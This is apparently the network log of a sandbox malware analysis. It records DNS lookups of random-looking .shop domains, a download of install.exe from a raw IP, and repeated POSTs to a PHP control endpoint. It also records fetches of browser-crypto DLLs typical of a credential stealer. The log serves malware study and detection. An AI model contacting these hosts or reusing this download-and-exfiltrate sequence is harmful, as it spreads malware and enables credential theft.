                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  89.169.67.172.in-addr.arpa
                                                                                                                                                                                                                                                                  IN PTR
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  59.9.26.104.in-addr.arpa
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  59.9.26.104.in-addr.arpa
                                                                                                                                                                                                                                                                  IN PTR
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  svc.iolo.com
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  svc.iolo.com
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  svc.iolo.com
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  20.157.87.45
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  miniaturefinerninewjs.shop
                                                                                                                                                                                                                                                                  RegAsm.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  miniaturefinerninewjs.shop
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  miniaturefinerninewjs.shop
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  172.67.173.139
                                                                                                                                                                                                                                                                  miniaturefinerninewjs.shop
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  104.21.30.191
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  201.44.21.104.in-addr.arpa
                                                                                                                                                                                                                                                                  RegAsm.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  201.44.21.104.in-addr.arpa
                                                                                                                                                                                                                                                                  IN PTR
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  67.65.42.5.in-addr.arpa
                                                                                                                                                                                                                                                                  RegAsm.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  67.65.42.5.in-addr.arpa
                                                                                                                                                                                                                                                                  IN PTR
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  86.229.13.49.in-addr.arpa
                                                                                                                                                                                                                                                                  RegAsm.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  86.229.13.49.in-addr.arpa
                                                                                                                                                                                                                                                                  IN PTR
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  86.229.13.49.in-addr.arpa
                                                                                                                                                                                                                                                                  IN PTR
                                                                                                                                                                                                                                                                  static862291349clients your-serverde
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  sofaprivateawarderysj.shop
                                                                                                                                                                                                                                                                  RegAsm.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  sofaprivateawarderysj.shop
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  sofaprivateawarderysj.shop
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  172.67.169.40
                                                                                                                                                                                                                                                                  sofaprivateawarderysj.shop
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  104.21.95.16
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  bitbucket.org
                                                                                                                                                                                                                                                                  RegAsm.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  bitbucket.org
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  bitbucket.org
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  104.192.141.1
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  127.85.21.104.in-addr.arpa
                                                                                                                                                                                                                                                                  RegAsm.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  127.85.21.104.in-addr.arpa
                                                                                                                                                                                                                                                                  IN PTR
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  prideconstituiiosjk.shop
                                                                                                                                                                                                                                                                  RegAsm.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  prideconstituiiosjk.shop
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  prideconstituiiosjk.shop
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  104.21.92.157
                                                                                                                                                                                                                                                                  prideconstituiiosjk.shop
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  172.67.195.106
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  92.92.68.104.in-addr.arpa
                                                                                                                                                                                                                                                                  RegAsm.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  92.92.68.104.in-addr.arpa
                                                                                                                                                                                                                                                                  IN PTR
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  92.92.68.104.in-addr.arpa
                                                                                                                                                                                                                                                                  IN PTR
                                                                                                                                                                                                                                                                  a104-68-92-92deploystaticakamaitechnologiescom
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  30.243.111.52.in-addr.arpa
                                                                                                                                                                                                                                                                  RegAsm.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  30.243.111.52.in-addr.arpa
                                                                                                                                                                                                                                                                  IN PTR
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  1xst.ru
                                                                                                                                                                                                                                                                  RegAsm.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  1xst.ru
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  1xst.ru
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  185.18.245.58
                                                                                                                                                                                                                                                                  1xst.ru
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  84.252.15.104
                                                                                                                                                                                                                                                                  1xst.ru
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  130.204.29.121
                                                                                                                                                                                                                                                                  1xst.ru
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  200.45.93.45
                                                                                                                                                                                                                                                                  1xst.ru
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  189.61.54.32
                                                                                                                                                                                                                                                                  1xst.ru
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  102.189.33.84
                                                                                                                                                                                                                                                                  1xst.ru
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  95.158.162.200
                                                                                                                                                                                                                                                                  1xst.ru
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  187.225.176.41
                                                                                                                                                                                                                                                                  1xst.ru
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  125.7.253.10
                                                                                                                                                                                                                                                                  1xst.ru
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  211.168.53.110
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  59.128.172.185.in-addr.arpa
                                                                                                                                                                                                                                                                  RegAsm.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  59.128.172.185.in-addr.arpa
                                                                                                                                                                                                                                                                  IN PTR
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  api.myip.com
                                                                                                                                                                                                                                                                  RegAsm.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  api.myip.com
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  api.myip.com
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  104.26.9.59
                                                                                                                                                                                                                                                                  api.myip.com
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  172.67.75.163
                                                                                                                                                                                                                                                                  api.myip.com
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  104.26.8.59
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  150.128.172.185.in-addr.arpa
                                                                                                                                                                                                                                                                  RegAsm.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  150.128.172.185.in-addr.arpa
                                                                                                                                                                                                                                                                  IN PTR
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                • flag-ru
                                                                                                                                                                                                                                                                  GET
                                                                                                                                                                                                                                                                  http://77.221.151.47/install.exe
                                                                                                                                                                                                                                                                  axplons.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  77.221.151.47:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  GET /install.exe HTTP/1.1
                                                                                                                                                                                                                                                                  Host: 77.221.151.47
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx/1.18.0
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:38:35 GMT
                                                                                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                  Content-Length: 4448942
                                                                                                                                                                                                                                                                  Last-Modified: Thu, 02 May 2024 13:52:07 GMT
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  ETag: "66339a87-43e2ae"
                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                • flag-de
                                                                                                                                                                                                                                                                  POST
                                                                                                                                                                                                                                                                  http://49.13.229.86/c73eed764cc59dcb.php
                                                                                                                                                                                                                                                                  RegAsm.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  49.13.229.86:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  POST /c73eed764cc59dcb.php HTTP/1.1
                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----KKFBAAFCGIEGDHIEBFII
                                                                                                                                                                                                                                                                  Host: 49.13.229.86
                                                                                                                                                                                                                                                                  Content-Length: 210
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:38:45 GMT
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                  Content-Length: 156
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                                • flag-de
                                                                                                                                                                                                                                                                  POST
                                                                                                                                                                                                                                                                  http://49.13.229.86/c73eed764cc59dcb.php
                                                                                                                                                                                                                                                                  RegAsm.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  49.13.229.86:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  POST /c73eed764cc59dcb.php HTTP/1.1
                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----GDAEBKJDHDAFIECBAKKJ
                                                                                                                                                                                                                                                                  Host: 49.13.229.86
                                                                                                                                                                                                                                                                  Content-Length: 268
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:38:45 GMT
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                  Content-Length: 1520
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                                • flag-de
                                                                                                                                                                                                                                                                  POST
                                                                                                                                                                                                                                                                  http://49.13.229.86/c73eed764cc59dcb.php
                                                                                                                                                                                                                                                                  RegAsm.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  49.13.229.86:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  POST /c73eed764cc59dcb.php HTTP/1.1
                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----BAAFBFBAAKECFIEBFIEC
                                                                                                                                                                                                                                                                  Host: 49.13.229.86
                                                                                                                                                                                                                                                                  Content-Length: 267
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:38:45 GMT
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                  Content-Length: 5416
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                                • flag-de
                                                                                                                                                                                                                                                                  POST
                                                                                                                                                                                                                                                                  http://49.13.229.86/c73eed764cc59dcb.php
                                                                                                                                                                                                                                                                  RegAsm.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  49.13.229.86:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  POST /c73eed764cc59dcb.php HTTP/1.1
                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----CGCFBFBGHDGDAKECAKJE
                                                                                                                                                                                                                                                                  Host: 49.13.229.86
                                                                                                                                                                                                                                                                  Content-Length: 4923
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:38:45 GMT
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                • flag-de
                                                                                                                                                                                                                                                                  GET
                                                                                                                                                                                                                                                                  http://49.13.229.86/84bad7132df89fd7/sqlite3.dll
                                                                                                                                                                                                                                                                  RegAsm.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  49.13.229.86:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  GET /84bad7132df89fd7/sqlite3.dll HTTP/1.1
                                                                                                                                                                                                                                                                  Host: 49.13.229.86
                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:38:46 GMT
                                                                                                                                                                                                                                                                  Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                                  Content-Length: 1106998
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT
                                                                                                                                                                                                                                                                  ETag: "10e436-5e7ec6832a180"
                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                • flag-de
                                                                                                                                                                                                                                                                  POST
                                                                                                                                                                                                                                                                  http://49.13.229.86/c73eed764cc59dcb.php
                                                                                                                                                                                                                                                                  RegAsm.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  49.13.229.86:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  POST /c73eed764cc59dcb.php HTTP/1.1
                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----DGDHJEGIEBFHDGDGHDHI
                                                                                                                                                                                                                                                                  Host: 49.13.229.86
                                                                                                                                                                                                                                                                  Content-Length: 359
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:38:46 GMT
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                • flag-de
                                                                                                                                                                                                                                                                  POST
                                                                                                                                                                                                                                                                  http://49.13.229.86/c73eed764cc59dcb.php
                                                                                                                                                                                                                                                                  RegAsm.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  49.13.229.86:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  POST /c73eed764cc59dcb.php HTTP/1.1
                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----JJECAAEHCFIEBGCBGHIE
                                                                                                                                                                                                                                                                  Host: 49.13.229.86
                                                                                                                                                                                                                                                                  Content-Length: 359
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:38:47 GMT
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                • flag-de
                                                                                                                                                                                                                                                                  GET
                                                                                                                                                                                                                                                                  http://49.13.229.86/84bad7132df89fd7/freebl3.dll
                                                                                                                                                                                                                                                                  RegAsm.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  49.13.229.86:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  GET /84bad7132df89fd7/freebl3.dll HTTP/1.1
                                                                                                                                                                                                                                                                  Host: 49.13.229.86
                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:38:47 GMT
                                                                                                                                                                                                                                                                  Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                                  Content-Length: 685392
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                                  ETag: "a7550-5e7e950876500"
                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                • flag-de
                                                                                                                                                                                                                                                                  GET
                                                                                                                                                                                                                                                                  http://49.13.229.86/84bad7132df89fd7/mozglue.dll
                                                                                                                                                                                                                                                                  RegAsm.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  49.13.229.86:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  GET /84bad7132df89fd7/mozglue.dll HTTP/1.1
                                                                                                                                                                                                                                                                  Host: 49.13.229.86
                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:38:48 GMT
                                                                                                                                                                                                                                                                  Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                                  Content-Length: 608080
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                                  ETag: "94750-5e7e950876500"
                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                • flag-de
                                                                                                                                                                                                                                                                  GET
                                                                                                                                                                                                                                                                  http://49.13.229.86/84bad7132df89fd7/msvcp140.dll
                                                                                                                                                                                                                                                                  RegAsm.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  49.13.229.86:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  GET /84bad7132df89fd7/msvcp140.dll HTTP/1.1
                                                                                                                                                                                                                                                                  Host: 49.13.229.86
                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:38:48 GMT
                                                                                                                                                                                                                                                                  Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                                  Content-Length: 450024
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                                  ETag: "6dde8-5e7e950876500"
                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                • flag-de
                                                                                                                                                                                                                                                                  GET
                                                                                                                                                                                                                                                                  http://49.13.229.86/84bad7132df89fd7/nss3.dll
                                                                                                                                                                                                                                                                  RegAsm.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  49.13.229.86:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  GET /84bad7132df89fd7/nss3.dll HTTP/1.1
                                                                                                                                                                                                                                                                  Host: 49.13.229.86
                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:38:49 GMT
                                                                                                                                                                                                                                                                  Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                                  Content-Length: 2046288
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                                  ETag: "1f3950-5e7e950876500"
                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                • flag-de
                                                                                                                                                                                                                                                                  GET
                                                                                                                                                                                                                                                                  http://49.13.229.86/84bad7132df89fd7/softokn3.dll
                                                                                                                                                                                                                                                                  RegAsm.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  49.13.229.86:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  GET /84bad7132df89fd7/softokn3.dll HTTP/1.1
                                                                                                                                                                                                                                                                  Host: 49.13.229.86
                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:38:51 GMT
                                                                                                                                                                                                                                                                  Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                                  Content-Length: 257872
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                                  ETag: "3ef50-5e7e950876500"
                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                • flag-de
                                                                                                                                                                                                                                                                  GET
                                                                                                                                                                                                                                                                  http://49.13.229.86/84bad7132df89fd7/vcruntime140.dll
                                                                                                                                                                                                                                                                  RegAsm.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  49.13.229.86:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  GET /84bad7132df89fd7/vcruntime140.dll HTTP/1.1
                                                                                                                                                                                                                                                                  Host: 49.13.229.86
                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:38:51 GMT
                                                                                                                                                                                                                                                                  Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                                  Content-Length: 80880
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                                  ETag: "13bf0-5e7e950876500"
                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                • flag-de
                                                                                                                                                                                                                                                                  POST
                                                                                                                                                                                                                                                                  http://49.13.229.86/c73eed764cc59dcb.php
                                                                                                                                                                                                                                                                  RegAsm.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  49.13.229.86:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  POST /c73eed764cc59dcb.php HTTP/1.1
                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----BAKKEGCAAECAAAKFBGIE
                                                                                                                                                                                                                                                                  Host: 49.13.229.86
                                                                                                                                                                                                                                                                  Content-Length: 947
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:38:52 GMT
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                • flag-de
                                                                                                                                                                                                                                                                  POST
